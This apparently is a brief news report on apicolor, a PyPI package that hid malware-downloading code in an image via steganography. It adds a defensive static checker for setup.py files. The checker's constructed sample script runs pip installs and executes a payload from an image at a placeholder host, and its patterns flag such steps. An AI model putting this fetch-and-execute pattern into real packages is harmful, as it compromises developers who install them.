Malicious Python Package Relies on Steganography to Download Malware

November 10, 2022

Check Point Research has detected a malicious open source code package that uses steganography to hide malicious code inside image files.

The malicious package was available on PyPI, a package index widely used by Python developers. After being notified, PyPI’s maintainers removed the malicious package.

The malicious package, apicolor, looks like one of many development packages available on PyPI. The header states the package is a “core lib for REST API.” The package installation script for apicolor has instructions to download additional packages (requests and judyb), along with a picture from the Web. The script then uses the steganography capabilities in judyb to uncover and execute the malicious code hidden inside the image file. The malicious code downloads malware from the Web and installs it on the user’s machine.
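
The following static check is an added example, not code from Check Point, PyPI or the package itself. It parses an install script without running it and flags the combination described above: dependencies installed at install time, an image fetched from the Web, and dynamically executed code. The finding labels, the regular expressions and both sample scripts are constructed for illustration, and the check is a heuristic rather than a complete detector.

```python
import ast
import re

IMAGE_URL = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|bmp)\b", re.I)
PIP_INSTALL = re.compile(r"\bpip3?\s+install\b", re.I)
DYNAMIC_EXEC = {"exec", "eval", "compile"}

def call_name(node):
    """Return the dotted name of a call target, e.g. 'os.system'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def scan_setup_script(source):
    """Return sorted finding labels for an install script's source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IMAGE_URL.search(node.value):
                findings.add("remote-image-url")
            if PIP_INSTALL.search(node.value):
                findings.add("install-time-pip-install")
        elif isinstance(node, ast.Call) and call_name(node) in DYNAMIC_EXEC:
            findings.add("dynamic-code-execution")
    return sorted(findings)

def is_suspicious(source):
    """True for the combination in the report: image fetch plus code execution."""
    found = scan_setup_script(source)
    return "remote-image-url" in found and "dynamic-code-execution" in found

# Constructed sample, not the real apicolor script. It is only parsed, never run;
# stego_lib_placeholder and hidden_payload_from are hypothetical names.
SAMPLE_SETUP = '''
import os
from setuptools import setup
os.system("pip install requests")
os.system("pip install stego_lib_placeholder")
exec(hidden_payload_from("https://example.invalid/picture.png"))
setup(name="demo", version="0.0.1")
'''
BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo", version="0.0.1", install_requires=["requests"])
'''
```

Calling `scan_setup_script` on the text of a package's `setup.py` before installation returns the labels that matched; `is_suspicious` is true only when the image URL and the dynamic execution appear together.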

Read More on Dark Reading